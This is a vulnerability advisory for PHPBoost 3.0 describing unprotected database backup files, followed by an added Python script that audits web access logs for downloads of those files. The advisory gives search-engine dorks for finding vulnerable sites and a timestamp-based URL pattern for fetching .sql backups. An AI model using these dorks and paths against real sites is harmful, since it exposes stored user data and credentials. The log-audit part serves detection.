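PHPBoost is a content management system. PHPBoost has a remote file download vulnerability that may allow the .sql files used for backups to be downloaded remotely.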

[+]info:
~~~~~~~~~

# Title : PHPBoost 3.0 Remote Download Backup Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Download Backup Database (*.sql) File
# Tested on : Windows XP sp3 FR
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
##
# [»] ~ special thanks to : Dr.Ride
##
# Go0gle Dorks : 
# 1> "Powered by PHPBoost 3.0" 
# 2> "Boosté par PHPBoost 3.0"
 
[+]poc:
~~~~~~~~~

# Demo:
[localhost]/[path]/cache/backup/backup_phpboost_11-03-29-17-35-34.sql
 
# Exploit :
[localhost]/[path]/cache/backup/backup_[sitname]_*Y*M*D*H*Mn*S*.sql
 
%{
Y = year
M = month
D = day
H = hour
Mn = minute
S = second
}%
# Download the backup .sql file ** access is not forbidden **
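
For site operators, the following added example (not part of the original advisory) scans web access logs for requests to the backup path described above and separates backups that were actually served from clients that requested backup names without success. It assumes the Apache/nginx "combined" log format; the function name `audit`, the `miss_threshold` parameter and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Name layout from the advisory: backup_<site>_YY-MM-DD-HH-MM-SS.sql
BACKUP_RE = re.compile(
    r"/cache/backup/backup_[^/\s?]+_\d{2}(?:-\d{2}){5}\.sql(?:\?|$)", re.I)
# Apache/nginx "combined" access-log line (assumed log format)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')

def audit(lines, miss_threshold=3):
    """Return (served, probing): backup files the server actually delivered,
    and clients with repeated refused or missed backup requests."""
    served, misses = [], defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not BACKUP_RE.search(m["path"]):
            continue
        if m["status"] in ("200", "206"):      # full or partial download
            served.append((m["ip"], m["path"], m["size"]))
        else:                                   # 403/404 and similar
            misses[m["ip"]] += 1
    probing = sorted(ip for ip, n in misses.items() if n >= miss_threshold)
    return served, probing

# Constructed sample log lines (documentation address ranges, not real traffic)
SAMPLE = [
    '192.0.2.10 - - [29/Mar/2011:17:40:01 +0000] "GET /cache/backup/backup_phpboost_11-03-29-17-35-34.sql HTTP/1.1" 200 48213 "-" "-"',
    '198.51.100.7 - - [29/Mar/2011:18:02:11 +0000] "GET /cache/backup/backup_phpboost_11-03-29-18-00-00.sql HTTP/1.1" 404 209 "-" "-"',
    '198.51.100.7 - - [29/Mar/2011:18:02:12 +0000] "GET /cache/backup/backup_phpboost_11-03-29-18-00-01.sql HTTP/1.1" 404 209 "-" "-"',
    '198.51.100.7 - - [29/Mar/2011:18:02:13 +0000] "GET /cache/backup/backup_phpboost_11-03-29-18-00-02.sql HTTP/1.1" 404 209 "-" "-"',
    '203.0.113.5 - - [29/Mar/2011:18:05:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.5 - - [29/Mar/2011:18:05:02 +0000] "GET /cache/backup/ HTTP/1.1" 403 199 "-" "-"',
]

if __name__ == "__main__":
    served, probing = audit(SAMPLE)
    for ip, path, size in served:
        print(f"SERVED  {ip} {path} ({size} bytes)")
    for ip in probing:
        print(f"PROBING {ip}")
```

Any entry in `served` means a database dump left the server, which is the condition the advisory describes when access to cache/backup/ is not forbidden.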